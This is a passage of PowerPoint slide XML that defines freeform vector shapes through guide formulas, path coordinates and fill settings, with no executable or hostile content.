              <a:gd name="T16" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T27" fmla="*/ 0 h 208"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T29" fmla="*/ 0 h 208"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T31" fmla="*/ 0 h 208"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T33" fmla="*/ 0 h 208"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T56" fmla="*/ 0 w 249"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 20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49"/>
              <a:gd name="T118" fmla="*/ 0 h 208"/>
              <a:gd name="T119" fmla="*/ 249 w 249"/>
              <a:gd name="T120" fmla="*/ 208 h 20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49" h="208">
                <a:moveTo>
                  <a:pt x="68" y="27"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="70" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="201" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244" y="169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="27"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10335" name="Freeform 416"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1549400" y="6900863"/>
            <a:ext cx="179387" cy="206375"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T17" fmla="*/ 0 h 91"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T19" fmla="*/ 0 h 91"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T21" fmla="*/ 0 h 91"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T40" fmla="*/ 0 w 79"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T42" fmla="*/ 0 w 79"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T44" fmla="*/ 0 w 79"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T97" fmla="*/ 2147483647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9"/>
              <a:gd name="T148" fmla="*/ 0 h 91"/>
              <a:gd name="T149" fmla="*/ 79 w 79"/>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9" h="91">
                <a:moveTo>
                  <a:pt x="78" y="3"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="86"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="3"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="333333"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10336" name="Freeform 417"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1568450" y="6954838"/>
            <a:ext cx="298450" cy="203200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T2" fmla="*/ 0 w 132"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T53" fmla="*/ 0 h 90"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T97" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T98" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T99" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T100" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T101" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T102" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T103" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T104" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T105" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T106" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T107" fmla="*/ 2147483647 h 9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2"/>
              <a:gd name="T163" fmla="*/ 0 h 90"/>
              <a:gd name="T164" fmla="*/ 132 w 132"/>
              <a:gd name="T165" fmla="*/ 90 h 9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2" h="90">
                <a:moveTo>
                  <a:pt x="1" y="68"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94" y="86"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="2"/>
                </a:lnTo>
